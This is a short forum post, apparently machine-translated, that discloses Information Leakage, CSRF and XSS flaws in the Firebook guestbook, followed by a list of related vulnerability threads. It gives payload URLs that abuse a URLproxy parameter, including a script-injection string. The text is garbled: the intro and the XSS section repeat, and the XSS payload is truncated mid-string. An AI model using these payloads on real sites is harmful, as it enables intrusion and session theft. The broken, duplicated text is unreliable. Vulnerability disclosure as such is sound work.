Vulnerability to Firebook
Page 1 of 1
Vulnerability to Firebook
There was found the Information Leakage, Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal and Full path disclosure vulnerabilities in Firebook. This guest
book. These vulnerabilities I found on exwp.com. What soon inform developers.
Details of vulnerabilities will come soon. First, inform web application developers.
Information Leakage:
CSRF:
Possible CSRF-attacks on other sites.
XSS:
[code:1:7c05]
http://site/path_to_firebook_admin/?URLproxy =% 3Cscript% 3Ealert (document
book. These vulnerabilities I found on exwp.com. What soon inform developers.
Details of vulnerabilities will come soon. First, inform web application developers.
Information Leakage:
- Code:
http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;
CSRF:
- Code:
http://site/path_to_firebook_admin/?URLproxy=http://site;
Possible CSRF-attacks on other sites.
XSS:
[code:1:7c05]
http://site/path_to_firebook_admin/?URLproxy =% 3Cscript% 3Ealert (document
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics
» Vulnerability to www.paypal.com
» Apocalyptic Vulnerability Percentages - FUD 101
» Microsoft IIS 0Day Vulnerability
» Symantec website XSS vulnerability
» eBay Motors XSS vulnerability
» Apocalyptic Vulnerability Percentages - FUD 101
» Microsoft IIS 0Day Vulnerability
» Symantec website XSS vulnerability
» eBay Motors XSS vulnerability
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum